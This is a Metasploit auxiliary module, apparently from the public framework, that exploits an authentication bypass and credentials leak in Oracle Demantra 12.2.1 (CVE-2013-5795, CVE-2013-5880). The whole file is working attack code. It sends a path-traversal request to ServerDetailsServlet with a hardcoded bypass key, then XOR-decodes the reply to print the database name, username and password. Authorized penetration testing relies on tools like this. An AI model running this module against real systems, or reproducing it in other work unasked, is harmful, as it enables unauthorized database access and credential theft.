## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Demantra Database Credentials Leak', 'Description' => %q{ This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine. }, 'References' => [ [ 'CVE', '2013-5795'], [ 'CVE', '2013-5880'], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ] ], 'Author' => [ 'Oliver Gruskovnjak' ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2014-02-28' )) register_options( [ Opt::RPORT(8080), OptBool.new('SSL', [false, 'Use SSL', false]) ]) end def run_host(ip) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'), 'vars_get' => { 'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1' } }) if res.nil? or res.body.empty? vprint_error("No content retrieved") return end if res.code == 404 vprint_error("File not found") return end if res.code == 200 creds = "" vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end print_good("Credentials decoded: #{creds}") unless creds.empty? end end end